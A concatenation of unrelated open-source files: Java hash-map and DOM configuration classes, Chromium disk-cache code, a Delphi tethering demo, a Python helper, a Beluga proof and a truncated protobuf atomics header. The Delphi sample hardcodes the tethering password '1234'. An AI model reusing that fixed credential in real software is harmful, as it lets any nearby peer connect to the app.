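package org.hsqldb_voltpatches.store;

public class IntKeyObjectMap extends BaseHashMap {

    public IntKeyObjectMap(int initialCapacity) {
        // int keys, Object values, no access-count table
        super(initialCapacity, BaseHashMap.intKeyOrValue,
              BaseHashMap.objectKeyOrValue, false);
    }

    public Object put(int key, Object value) {
        // addOrRemove returns the previous value stored under the key, if any
        return super.addOrRemove(key, value, false);
    }

    public Object get(int key) {
        // getLookup returns a negative index when the key is absent
        int lookup = getLookup(key);
        return lookup < 0 ? null : objectValueTable[lookup];
    }

    public Object remove(int key) {
        return super.addOrRemove(key, null, true);
    }
}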
{ "pile_set_name": "Github" }
$$ MODE TUSCRIPT
PRINT "Goodbye, World!"
{ "pile_set_name": "Github" }
// Copyright (c) 2012 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include <utility> #include "base/files/file_path.h" #include "base/macros.h" #include "base/metrics/field_trial.h" #include "base/single_thread_task_runner.h" #include "base/task_scheduler/task_scheduler.h" #include "net/base/cache_type.h" #include "net/base/net_errors.h" #include "net/disk_cache/backend_cleanup_tracker.h" #include "net/disk_cache/blockfile/backend_impl.h" #include "net/disk_cache/cache_util.h" #include "net/disk_cache/disk_cache.h" #include "net/disk_cache/memory/mem_backend_impl.h" #include "net/disk_cache/simple/simple_backend_impl.h" namespace { // Builds an instance of the backend depending on platform, type, experiments // etc. Takes care of the retry state. This object will self-destroy when // finished. class CacheCreator { public: CacheCreator(const base::FilePath& path, bool force, int max_bytes, net::CacheType type, net::BackendType backend_type, uint32_t flags, net::NetLog* net_log, std::unique_ptr<disk_cache::Backend>* backend, base::OnceClosure post_cleanup_callback, net::CompletionOnceCallback callback); int TryCreateCleanupTrackerAndRun(); // Creates the backend, the cleanup context for it having been already // established... or purposefully left as null. int Run(); private: ~CacheCreator(); void DoCallback(int result); void OnIOComplete(int result); const base::FilePath path_; bool force_; bool retry_; int max_bytes_; net::CacheType type_; net::BackendType backend_type_; #if !defined(OS_ANDROID) uint32_t flags_; #endif std::unique_ptr<disk_cache::Backend>* backend_; base::OnceClosure post_cleanup_callback_; net::CompletionOnceCallback callback_; std::unique_ptr<disk_cache::Backend> created_cache_; net::NetLog* net_log_; scoped_refptr<disk_cache::BackendCleanupTracker> cleanup_tracker_; DISALLOW_COPY_AND_ASSIGN(CacheCreator); }; CacheCreator::CacheCreator(const base::FilePath& path, bool force, int max_bytes, net::CacheType type, net::BackendType backend_type, uint32_t flags, net::NetLog* net_log, std::unique_ptr<disk_cache::Backend>* backend, base::OnceClosure post_cleanup_callback, net::CompletionOnceCallback callback) : path_(path), force_(force), retry_(false), max_bytes_(max_bytes), type_(type), backend_type_(backend_type), #if !defined(OS_ANDROID) flags_(flags), #endif backend_(backend), post_cleanup_callback_(std::move(post_cleanup_callback)), callback_(std::move(callback)), net_log_(net_log) { } CacheCreator::~CacheCreator() = default; int CacheCreator::Run() { #if defined(OS_ANDROID) static const bool kSimpleBackendIsDefault = true; #else static const bool kSimpleBackendIsDefault = false; #endif if (backend_type_ == net::CACHE_BACKEND_SIMPLE || (backend_type_ == net::CACHE_BACKEND_DEFAULT && kSimpleBackendIsDefault)) { disk_cache::SimpleBackendImpl* simple_cache = new disk_cache::SimpleBackendImpl(path_, cleanup_tracker_.get(), /* file_tracker = */ nullptr, max_bytes_, type_, net_log_); created_cache_.reset(simple_cache); return simple_cache->Init( base::Bind(&CacheCreator::OnIOComplete, base::Unretained(this))); } // Avoid references to blockfile functions on Android to reduce binary size. 
#if defined(OS_ANDROID) return net::ERR_FAILED; #else disk_cache::BackendImpl* new_cache = new disk_cache::BackendImpl( path_, cleanup_tracker_.get(), /*cache_thread = */ nullptr, net_log_); created_cache_.reset(new_cache); new_cache->SetMaxSize(max_bytes_); new_cache->SetType(type_); new_cache->SetFlags(flags_); int rv = new_cache->Init( base::Bind(&CacheCreator::OnIOComplete, base::Unretained(this))); DCHECK_EQ(net::ERR_IO_PENDING, rv); return rv; #endif } int CacheCreator::TryCreateCleanupTrackerAndRun() { // Before creating a cache Backend, a BackendCleanupTracker object is needed // so there is a place to keep track of outstanding I/O even after the backend // object itself is destroyed, so that further use of the directory // doesn't race with those outstanding disk I/O ops. // This method's purpose it to grab exlusive ownership of a fresh // BackendCleanupTracker for the cache path, and then move on to Run(), // which will take care of creating the actual cache backend. It's possible // that something else is currently making use of the directory, in which // case BackendCleanupTracker::TryCreate will fail, but will just have // TryCreateCleanupTrackerAndRun run again at an opportune time to make // another attempt. // The resulting BackendCleanupTracker is stored into a scoped_refptr member // so that it's kept alive while |this| CacheCreator exists , so that in the // case Run() needs to retry Backend creation the same BackendCleanupTracker // is used for both attempts, and |post_cleanup_callback_| gets called after // the second try, not the first one. cleanup_tracker_ = disk_cache::BackendCleanupTracker::TryCreate( path_, base::BindOnce(base::IgnoreResult( &CacheCreator::TryCreateCleanupTrackerAndRun), base::Unretained(this))); if (!cleanup_tracker_) return net::ERR_IO_PENDING; if (!post_cleanup_callback_.is_null()) cleanup_tracker_->AddPostCleanupCallback(std::move(post_cleanup_callback_)); return Run(); } void CacheCreator::DoCallback(int result) { DCHECK_NE(net::ERR_IO_PENDING, result); if (result == net::OK) { *backend_ = std::move(created_cache_); } else { LOG(ERROR) << "Unable to create cache"; created_cache_.reset(); } std::move(callback_).Run(result); delete this; } // If the initialization of the cache fails, and |force| is true, we will // discard the whole cache and create a new one. void CacheCreator::OnIOComplete(int result) { if (result == net::OK || !force_ || retry_) return DoCallback(result); // This is a failure and we are supposed to try again, so delete the object, // delete all the files, and try again. retry_ = true; created_cache_.reset(); if (!disk_cache::DelayedCacheCleanup(path_)) return DoCallback(result); // The worker thread will start deleting files soon, but the original folder // is not there anymore... let's create a new set of files. 
int rv = Run(); DCHECK_EQ(net::ERR_IO_PENDING, rv); } } // namespace namespace disk_cache { int CreateCacheBackendImpl(net::CacheType type, net::BackendType backend_type, const base::FilePath& path, int max_bytes, bool force, net::NetLog* net_log, std::unique_ptr<Backend>* backend, base::OnceClosure post_cleanup_callback, net::CompletionOnceCallback callback) { DCHECK(!callback.is_null()); if (type == net::MEMORY_CACHE) { std::unique_ptr<MemBackendImpl> mem_backend_impl = disk_cache::MemBackendImpl::CreateBackend(max_bytes, net_log); if (mem_backend_impl) { mem_backend_impl->SetPostCleanupCallback( std::move(post_cleanup_callback)); *backend = std::move(mem_backend_impl); return net::OK; } else { if (!post_cleanup_callback.is_null()) base::SequencedTaskRunnerHandle::Get()->PostTask( FROM_HERE, std::move(post_cleanup_callback)); return net::ERR_FAILED; } } bool had_post_cleanup_callback = !post_cleanup_callback.is_null(); CacheCreator* creator = new CacheCreator( path, force, max_bytes, type, backend_type, kNone, net_log, backend, std::move(post_cleanup_callback), std::move(callback)); if (type == net::DISK_CACHE || type == net::MEDIA_CACHE) { DCHECK(!had_post_cleanup_callback); return creator->Run(); } return creator->TryCreateCleanupTrackerAndRun(); } int CreateCacheBackend(net::CacheType type, net::BackendType backend_type, const base::FilePath& path, int max_bytes, bool force, net::NetLog* net_log, std::unique_ptr<Backend>* backend, net::CompletionOnceCallback callback) { return CreateCacheBackendImpl(type, backend_type, path, max_bytes, force, net_log, backend, base::OnceClosure(), std::move(callback)); } int CreateCacheBackend(net::CacheType type, net::BackendType backend_type, const base::FilePath& path, int max_bytes, bool force, net::NetLog* net_log, std::unique_ptr<Backend>* backend, base::OnceClosure post_cleanup_callback, net::CompletionOnceCallback callback) { return CreateCacheBackendImpl( type, backend_type, path, max_bytes, force, net_log, backend, std::move(post_cleanup_callback), std::move(callback)); } void FlushCacheThreadForTesting() { // For simple backend. SimpleBackendImpl::FlushWorkerPoolForTesting(); base::TaskScheduler::GetInstance()->FlushForTesting(); // Block backend. BackendImpl::FlushForTesting(); } int Backend::CalculateSizeOfEntriesBetween(base::Time initial_time, base::Time end_time, CompletionOnceCallback callback) { return net::ERR_NOT_IMPLEMENTED; } uint8_t Backend::GetEntryInMemoryData(const std::string& key) { return 0; } void Backend::SetEntryInMemoryData(const std::string& key, uint8_t data) {} } // namespace disk_cache
{ "pile_set_name": "Github" }
//---------------------------------------------------------------------------
// This software is Copyright (c) 2015 Embarcadero Technologies, Inc.
// You may only use this software if you are an authorized licensee
// of an Embarcadero developer tools product.
// This software is considered a Redistributable as defined under
// the software license agreement that comes with the Embarcadero Products
// and is subject to that software license agreement.
//---------------------------------------------------------------------------
unit DesktopWall;

interface

uses
  System.SysUtils, System.Types, System.UITypes, System.Classes, System.Variants,
  FMX.Types, FMX.Graphics, FMX.Controls, FMX.Forms, FMX.Dialogs, FMX.StdCtrls,
  FMX.Objects, IPPeerClient, IPPeerServer, System.Tether.Manager,
  System.Tether.AppProfile, System.Tether.NetworkAdapter;

type
  TForm48 = class(TForm)
    MediaReceiverManager: TTetheringManager;
    MediaReceiverProfile: TTetheringAppProfile;
    CalloutPanel1: TCalloutPanel;
    Image1: TImage;
    Label1: TLabel;
    procedure MediaReceiverProfileResourceReceived(const Sender: TObject;
      const AResource: TRemoteResource);
    procedure MediaReceiverManagerRequestManagerPassword(const Sender: TObject;
      const RemoteIdentifier: string; var Password: string);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form48: TForm48;

implementation

{$R *.fmx}

procedure TForm48.MediaReceiverManagerRequestManagerPassword(const Sender: TObject;
  const RemoteIdentifier: string; var Password: string);
begin
  Password := '1234';
end;

procedure TForm48.MediaReceiverProfileResourceReceived(const Sender: TObject;
  const AResource: TRemoteResource);
begin
  Image1.Bitmap.LoadFromStream(AResource.Value.AsStream);
end;

end.
{ "pile_set_name": "Github" }
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-

import os
import subprocess

SDS_JSON_FILE_EXTENSION = '.sdsjson'


def fail(*args):
    error = ' '.join(str(arg) for arg in args)
    raise Exception(error)


git_repo_path = os.path.abspath(subprocess.check_output(['git', 'rev-parse', '--show-toplevel']).strip())
print 'git_repo_path:', git_repo_path


def sds_to_relative_path(path):
    path = os.path.abspath(path)
    if not path.startswith(git_repo_path):
        fail('Unexpected path:', path)
    path = path[len(git_repo_path):]
    if path.startswith(os.sep):
        path = path[len(os.sep):]
    return path


def sds_from_relative_path(path):
    return os.path.join(git_repo_path, path)


def clean_up_generated_code(text):
    # Remove trailing whitespace.
    lines = text.split('\n')
    lines = [line.rstrip() for line in lines]
    text = '\n'.join(lines)

    # Compact newlines.
    while '\n\n\n' in text:
        text = text.replace('\n\n\n', '\n\n')

    # Ensure there's a trailing newline.
    return text.strip() + '\n'


def clean_up_generated_swift(text):
    return clean_up_generated_code(text)


def clean_up_generated_objc(text):
    return clean_up_generated_code(text)


def pretty_module_path(path):
    path = os.path.abspath(path)
    if path.startswith(git_repo_path):
        path = path[len(git_repo_path):]
    return path


def write_text_file_if_changed(file_path, text):
    if os.path.exists(file_path):
        with open(file_path, 'rt') as f:
            oldText = f.read()
        if oldText == text:
            return

    with open(file_path, 'wt') as f:
        f.write(text)
{ "pile_set_name": "Github" }
%{ Lambda-terms }%

LF tp: type =
| nat: tp
| arr: tp -> tp -> tp
;

LF term: type =
| app: term -> term -> term
| lam: tp -> (term -> term) -> term
;

LF value: term -> type =
| v_lam: value (lam T M)
;

schema ctx = term;

% [x:tm, y:tm |- x]
% [x:tm, y:tm |- lam \w. app x w]
%
% ---------------------------------------------------------- %
% Small-step operational semantics

LF step: term -> term -> type =
| e_app_1 : step M1 M1' -> step (app M1 M2) (app M1' M2)
| e_app_2 : step M2 M2' -> value M1 -> step (app M1 M2) (app M1 M2')
| e_app_abs : value M2 -> step (app (lam T M) M2) (M M2)
;

% ---------------------------------------------------------- %

LF hastype: term -> tp -> type =
| t_lam : ({x:term} hastype x T -> hastype (E x) S) -> hastype (lam T E) (arr T S)
| t_app : hastype E1 (arr T S) -> hastype E2 T -> hastype (app E1 E2) S
;

% ---------------------------------------------------------- %

rec tps: [ |- hastype M T] -> [ |- step M N] -> [ |- hastype N T] =
/ total s (tps m t n d s)/
fn d => fn s => case s of
| [ |- e_app_1 S1] =>
  let [ |- t_app D1 D2] = d in
  let [ |- F1] = tps [ |- D1] [ |- S1] in
  [ |- t_app F1 D2 ]

| [ |- e_app_2 S2 _ ] =>
  let [ |- t_app D1 D2] = d in
  let [ |- F2] = tps [ |- D2] [ |- S2] in
  [ |- t_app D1 F2]

| [ |- e_app_abs V] =>
  let [ |- t_app (t_lam \x.\u. D) D2] = d in
  [ |- D[_,D2]]
;
{ "pile_set_name": "Github" }
/* * Copyright (C) 2010 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.harmony.xml.dom; import java.util.Map; import java.util.TreeMap; import org.w3c.dom.DOMConfiguration; import org.w3c.dom.DOMError; import org.w3c.dom.DOMErrorHandler; import org.w3c.dom.DOMException; import org.w3c.dom.DOMStringList; import org.w3c.dom.NamedNodeMap; import org.w3c.dom.Node; /** * A minimal implementation of DOMConfiguration. This implementation uses inner * parameter instances to centralize each parameter's behavior. */ public final class DOMConfigurationImpl implements DOMConfiguration { private static final Map<String, Parameter> PARAMETERS = new TreeMap<String, Parameter>(String.CASE_INSENSITIVE_ORDER); static { /* * True to canonicalize the document (unsupported). This includes * removing DocumentType nodes from the tree and removing unused * namespace declarations. Setting this to true also sets these * parameters: * entities = false * normalize-characters = false * cdata-sections = false * namespaces = true * namespace-declarations = true * well-formed = true * element-content-whitespace = true * Setting these parameters to another value shall revert the canonical * form to false. */ PARAMETERS.put("canonical-form", new FixedParameter(false)); /* * True to keep existing CDATA nodes; false to replace them/merge them * into adjacent text nodes. */ PARAMETERS.put("cdata-sections", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { return config.cdataSections; } public void set(DOMConfigurationImpl config, Object value) { config.cdataSections = (Boolean) value; } }); /* * True to check character normalization (unsupported). */ PARAMETERS.put("check-character-normalization", new FixedParameter(false)); /* * True to keep comments in the document; false to discard them. */ PARAMETERS.put("comments", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { return config.comments; } public void set(DOMConfigurationImpl config, Object value) { config.comments = (Boolean) value; } }); /* * True to expose schema normalized values. Setting this to true sets * the validate parameter to true. Has no effect when validate is false. */ PARAMETERS.put("datatype-normalization", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { return config.datatypeNormalization; } public void set(DOMConfigurationImpl config, Object value) { if ((Boolean) value) { config.datatypeNormalization = true; config.validate = true; } else { config.datatypeNormalization = false; } } }); /* * True to keep whitespace elements in the document; false to discard * them (unsupported). */ PARAMETERS.put("element-content-whitespace", new FixedParameter(true)); /* * True to keep entity references in the document; false to expand them. 
*/ PARAMETERS.put("entities", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { return config.entities; } public void set(DOMConfigurationImpl config, Object value) { config.entities = (Boolean) value; } }); /* * Handler to be invoked when errors are encountered. */ PARAMETERS.put("error-handler", new Parameter() { public Object get(DOMConfigurationImpl config) { return config.errorHandler; } public void set(DOMConfigurationImpl config, Object value) { config.errorHandler = (DOMErrorHandler) value; } public boolean canSet(DOMConfigurationImpl config, Object value) { return value == null || value instanceof DOMErrorHandler; } }); /* * Bulk alias to set the following parameter values: * validate-if-schema = false * entities = false * datatype-normalization = false * cdata-sections = false * namespace-declarations = true * well-formed = true * element-content-whitespace = true * comments = true * namespaces = true. * Querying this returns true if all of the above parameters have the * listed values; false otherwise. */ PARAMETERS.put("infoset", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { // validate-if-schema is always false // element-content-whitespace is always true // namespace-declarations is always true return !config.entities && !config.datatypeNormalization && !config.cdataSections && config.wellFormed && config.comments && config.namespaces; } public void set(DOMConfigurationImpl config, Object value) { if ((Boolean) value) { // validate-if-schema is always false // element-content-whitespace is always true // namespace-declarations is always true config.entities = false; config.datatypeNormalization = false; config.cdataSections = false; config.wellFormed = true; config.comments = true; config.namespaces = true; } } }); /* * True to perform namespace processing; false for none. */ PARAMETERS.put("namespaces", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { return config.namespaces; } public void set(DOMConfigurationImpl config, Object value) { config.namespaces = (Boolean) value; } }); /** * True to include namespace declarations; false to discard them * (unsupported). Even when namespace declarations are discarded, * prefixes are retained. * * Has no effect if namespaces is false. */ PARAMETERS.put("namespace-declarations", new FixedParameter(true)); /* * True to fully normalize characters (unsupported). */ PARAMETERS.put("normalize-characters", new FixedParameter(false)); /* * A list of whitespace-separated URIs representing the schemas to validate * against. Has no effect if schema-type is null. */ PARAMETERS.put("schema-location", new Parameter() { public Object get(DOMConfigurationImpl config) { return config.schemaLocation; } public void set(DOMConfigurationImpl config, Object value) { config.schemaLocation = (String) value; } public boolean canSet(DOMConfigurationImpl config, Object value) { return value == null || value instanceof String; } }); /* * URI representing the type of schema language, such as * "http://www.w3.org/2001/XMLSchema" or "http://www.w3.org/TR/REC-xml". 
*/ PARAMETERS.put("schema-type", new Parameter() { public Object get(DOMConfigurationImpl config) { return config.schemaType; } public void set(DOMConfigurationImpl config, Object value) { config.schemaType = (String) value; } public boolean canSet(DOMConfigurationImpl config, Object value) { return value == null || value instanceof String; } }); /* * True to split CDATA sections containing "]]>"; false to signal an * error instead. */ PARAMETERS.put("split-cdata-sections", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { return config.splitCdataSections; } public void set(DOMConfigurationImpl config, Object value) { config.splitCdataSections = (Boolean) value; } }); /* * True to require validation against a schema or DTD. Validation will * recompute element content whitespace, ID and schema type data. * * Setting this unsets validate-if-schema. */ PARAMETERS.put("validate", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { return config.validate; } public void set(DOMConfigurationImpl config, Object value) { // validate-if-schema is always false config.validate = (Boolean) value; } }); /* * True to validate if a schema was declared (unsupported). Setting this * unsets validate. */ PARAMETERS.put("validate-if-schema", new FixedParameter(false)); /* * True to report invalid characters in node names, attributes, elements, * comments, text, CDATA sections and processing instructions. */ PARAMETERS.put("well-formed", new BooleanParameter() { public Object get(DOMConfigurationImpl config) { return config.wellFormed; } public void set(DOMConfigurationImpl config, Object value) { config.wellFormed = (Boolean) value; } }); // TODO add "resource-resolver" property for use with LS feature... } private boolean cdataSections = true; private boolean comments = true; private boolean datatypeNormalization = false; private boolean entities = true; private DOMErrorHandler errorHandler; private boolean namespaces = true; private String schemaLocation; private String schemaType; private boolean splitCdataSections = true; private boolean validate = false; private boolean wellFormed = true; interface Parameter { Object get(DOMConfigurationImpl config); void set(DOMConfigurationImpl config, Object value); boolean canSet(DOMConfigurationImpl config, Object value); } static class FixedParameter implements Parameter { final Object onlyValue; FixedParameter(Object onlyValue) { this.onlyValue = onlyValue; } public Object get(DOMConfigurationImpl config) { return onlyValue; } public void set(DOMConfigurationImpl config, Object value) { if (!onlyValue.equals(value)) { throw new DOMException(DOMException.NOT_SUPPORTED_ERR, "Unsupported value: " + value); } } public boolean canSet(DOMConfigurationImpl config, Object value) { return onlyValue.equals(value); } } static abstract class BooleanParameter implements Parameter { public boolean canSet(DOMConfigurationImpl config, Object value) { return value instanceof Boolean; } } public boolean canSetParameter(String name, Object value) { Parameter parameter = PARAMETERS.get(name); return parameter != null && parameter.canSet(this, value); } public void setParameter(String name, Object value) throws DOMException { Parameter parameter = PARAMETERS.get(name); if (parameter == null) { throw new DOMException(DOMException.NOT_FOUND_ERR, "No such parameter: " + name); } try { parameter.set(this, value); } catch (NullPointerException e) { throw new DOMException(DOMException.TYPE_MISMATCH_ERR, "Null not allowed for " + name); } catch 
(ClassCastException e) { throw new DOMException(DOMException.TYPE_MISMATCH_ERR, "Invalid type for " + name + ": " + value.getClass()); } } public Object getParameter(String name) throws DOMException { Parameter parameter = PARAMETERS.get(name); if (parameter == null) { throw new DOMException(DOMException.NOT_FOUND_ERR, "No such parameter: " + name); } return parameter.get(this); } public DOMStringList getParameterNames() { final String[] result = PARAMETERS.keySet().toArray(new String[PARAMETERS.size()]); return new DOMStringList() { public String item(int index) { return index < result.length ? result[index] : null; } public int getLength() { return result.length; } public boolean contains(String str) { return PARAMETERS.containsKey(str); // case-insensitive. } }; } public void normalize(Node node) { /* * Since we don't validate, this code doesn't take into account the * following "supported" parameters: datatype-normalization, entities, * schema-location, schema-type, or validate. * * TODO: normalize namespaces */ switch (node.getNodeType()) { case Node.CDATA_SECTION_NODE: CDATASectionImpl cdata = (CDATASectionImpl) node; if (cdataSections) { if (cdata.needsSplitting()) { if (splitCdataSections) { cdata.split(); report(DOMError.SEVERITY_WARNING, "cdata-sections-splitted"); } else { report(DOMError.SEVERITY_ERROR, "wf-invalid-character"); } } checkTextValidity(cdata.buffer); break; } node = cdata.replaceWithText(); // fall through case Node.TEXT_NODE: TextImpl text = (TextImpl) node; text = text.minimize(); if (text != null) { checkTextValidity(text.buffer); } break; case Node.COMMENT_NODE: CommentImpl comment = (CommentImpl) node; if (!comments) { comment.getParentNode().removeChild(comment); break; } if (comment.containsDashDash()) { report(DOMError.SEVERITY_ERROR, "wf-invalid-character"); } checkTextValidity(comment.buffer); break; case Node.PROCESSING_INSTRUCTION_NODE: checkTextValidity(((ProcessingInstructionImpl) node).getData()); break; case Node.ATTRIBUTE_NODE: checkTextValidity(((AttrImpl) node).getValue()); break; case Node.ELEMENT_NODE: ElementImpl element = (ElementImpl) node; NamedNodeMap attributes = element.getAttributes(); for (int i = 0; i < attributes.getLength(); i++) { normalize(attributes.item(i)); } // fall through case Node.DOCUMENT_NODE: case Node.DOCUMENT_FRAGMENT_NODE: Node next; for (Node child = node.getFirstChild(); child != null; child = next) { // lookup next eagerly because normalize() may remove its subject next = child.getNextSibling(); normalize(child); } break; case Node.NOTATION_NODE: case Node.DOCUMENT_TYPE_NODE: case Node.ENTITY_NODE: case Node.ENTITY_REFERENCE_NODE: break; default: throw new DOMException(DOMException.NOT_SUPPORTED_ERR, "Unsupported node type " + node.getNodeType()); } } private void checkTextValidity(CharSequence s) { if (wellFormed && !isValid(s)) { report(DOMError.SEVERITY_ERROR, "wf-invalid-character"); } } /** * Returns true if all of the characters in the text are permitted for use * in XML documents. */ private boolean isValid(CharSequence text) { for (int i = 0; i < text.length(); i++) { char c = text.charAt(i); // as defined by http://www.w3.org/TR/REC-xml/#charsets. boolean valid = c == 0x9 || c == 0xA || c == 0xD || (c >= 0x20 && c <= 0xd7ff) || (c >= 0xe000 && c <= 0xfffd); if (!valid) { return false; } } return true; } private void report(short severity, String type) { if (errorHandler != null) { // TODO: abort if handleError returns false errorHandler.handleError(new DOMErrorImpl(severity, type)); } } }
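/*
 * Editor's sketch (assumption, not part of the original source file): the parameter
 * table and normalize() walk above are usually driven through the standard DOM Level 3
 * API on org.w3c.dom.Document. The class and method names below are illustrative only
 * and assume a Document whose getDomConfig() is backed by this implementation.
 */
class DomConfigurationUsageSketch {
    static void stripCommentsAndNormalize(org.w3c.dom.Document document) {
        org.w3c.dom.DOMConfiguration config = document.getDomConfig();
        if (config.canSetParameter("comments", Boolean.FALSE)) {
            config.setParameter("comments", Boolean.FALSE); // comment nodes are removed during normalize()
        }
        config.setParameter("split-cdata-sections", Boolean.TRUE); // split "]]>" instead of reporting an error
        document.normalizeDocument(); // drives a normalize() walk like the one implemented above
    }
}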
{ "pile_set_name": "Github" }
// Protocol Buffers - Google's data interchange format // Copyright 2012 Google Inc. All rights reserved. // https://developers.google.com/protocol-buffers/ // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are // met: // // * Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above // copyright notice, this list of conditions and the following disclaimer // in the documentation and/or other materials provided with the // distribution. // * Neither the name of Google Inc. nor the names of its // contributors may be used to endorse or promote products derived from // this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS // "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT // LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR // A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT // OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, // SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT // LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, // DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // This file is an internal atomic implementation, use atomicops.h instead. #ifndef GOOGLE_PROTOBUF_ATOMICOPS_INTERNALS_GENERIC_C11_ATOMIC_H_ #define GOOGLE_PROTOBUF_ATOMICOPS_INTERNALS_GENERIC_C11_ATOMIC_H_ #include <atomic> namespace google_public { namespace protobuf { namespace internal { // This implementation is transitional and maintains the original API for // atomicops.h. This requires casting memory locations to the atomic types, and // assumes that the API and the C++11 implementation are layout-compatible, // which isn't true for all implementations or hardware platforms. The static // assertion should detect this issue, were it to fire then this header // shouldn't be used. // // TODO(jfb) If this header manages to stay committed then the API should be // modified, and all call sites updated. typedef volatile std::atomic<Atomic32>* AtomicLocation32; static_assert(sizeof(*(AtomicLocation32) nullptr) == sizeof(Atomic32), "incompatible 32-bit atomic layout"); inline void MemoryBarrierInternal() { #if defined(__GLIBCXX__) // Work around libstdc++ bug 51038 where atomic_thread_fence was declared but // not defined, leading to the linker complaining about undefined references. 
__atomic_thread_fence(std::memory_order_seq_cst); #else std::atomic_thread_fence(std::memory_order_seq_cst); #endif } inline Atomic32 NoBarrier_CompareAndSwap(volatile Atomic32* ptr, Atomic32 old_value, Atomic32 new_value) { ((AtomicLocation32)ptr) ->compare_exchange_strong(old_value, new_value, std::memory_order_relaxed, std::memory_order_relaxed); return old_value; } inline Atomic32 NoBarrier_AtomicExchange(volatile Atomic32* ptr, Atomic32 new_value) { return ((AtomicLocation32)ptr) ->exchange(new_value, std::memory_order_relaxed); } inline Atomic32 NoBarrier_AtomicIncrement(volatile Atomic32* ptr, Atomic32 increment) { return increment + ((AtomicLocation32)ptr) ->fetch_add(increment, std::memory_order_relaxed); } inline Atomic32 Barrier_AtomicIncrement(volatile Atomic32* ptr, Atomic32 increment) { return increment + ((AtomicLocation32)ptr)->fetch_add(increment); } inline Atomic32 Acquire_CompareAndSwap(volatile Atomic32* ptr, Atomic32 old_value, Atomic32 new_value) { ((AtomicLocation32)ptr) ->compare_exchange_strong(old_value, new_value, std::memory_order_acquire, std::memory_order_acquire); return old_value; } inline Atomic32 Release_CompareAndSwap(volatile Atomic32* ptr, Atomic32 old_value, Atomic32 new_value) { ((AtomicLocation32)ptr) ->compare_exchange_strong(old_value, new_value, std::memory_order_release, std::memory_order_relaxed); return old_value; } inline void NoBarrier_Store(volatile Atomic32* ptr, Atomic32 value) { ((AtomicLocation32)ptr)->store(value, std::memory_order_relaxed); } inline void Acquire_Store(volatile Atomic32* ptr, Atomic32 value) { ((AtomicLocation32)ptr)->store(value, std::memory_order_relaxed); MemoryBarrierInternal(); } inline void Release_Store(volatile Atomic32* ptr, Atomic32 value) { ((AtomicLocation32)ptr)->store(value, std::memory_order_release); } inline Atomic32 NoBarrier_Load(volatile const Atomic32* ptr) { return ((AtomicLocation32)ptr)->load(std::memory_order_relaxed); } inline Atomic32 Acquire_Load(volatile const Atomic32* ptr) { return ((AtomicLocation32)ptr)->load(std::memory_order_acquire); } inline Atomic32 Release_Load(volatile const Atomic32* ptr) { MemoryBarrierInternal(); return ((AtomicLocation32)ptr)->load(std::memory_order_relaxed); } #if defined(GOOGLE_PROTOBUF_ARCH_64_BIT) typedef volatile std::atomic<Atomic64>* AtomicLocation64; static_assert(sizeof(*(AtomicLocation64) nullptr) == sizeof(Atomic64), "incompatible 64-bit atomic layout"); inline Atomic64 NoBarrier_CompareAndSwap(volatile Atomic64* ptr, Atomic64 old_value, Atomic64 new_value) { ((AtomicLocation64)ptr) ->compare_exchange_strong(old_value, new_value, std::memory_order_relaxed, std::memory_order_relaxed); return old_value; } inline Atomic64 NoBarrier_AtomicExchange(volatile Atomic64* ptr, Atomic64 new_value) { return ((AtomicLocation64)ptr) ->exchange(new_value, std::memory_order_relaxed); } inline Atomic64 NoBarrier_AtomicIncrement(volatile Atomic64* ptr, Atomic64 increment) { return increment + ((AtomicLocation64)ptr) ->fetch_add(increment, std::memory_order_relaxed); } inline Atomic64 Barrier_AtomicIncrement(volatile Atomic64* ptr, Atomic64 increment) { return increment + ((AtomicLocation64)ptr)->fetch_add(increment); } inline Atomic64 Acquire_CompareAndSwap(volatile Atomic64* ptr, Atomic64 old_value, Atomic64 new_value) { ((AtomicLocation64)ptr) ->compare_exchange_strong(old_value, new_value, std::memory_order_acquire, std::memory_order_acquire); return old_value; } inline Atomic64 Release_CompareAndSwap(volatile Atomic64* ptr, Atomic64 old_value, Atomic64 new_value) 
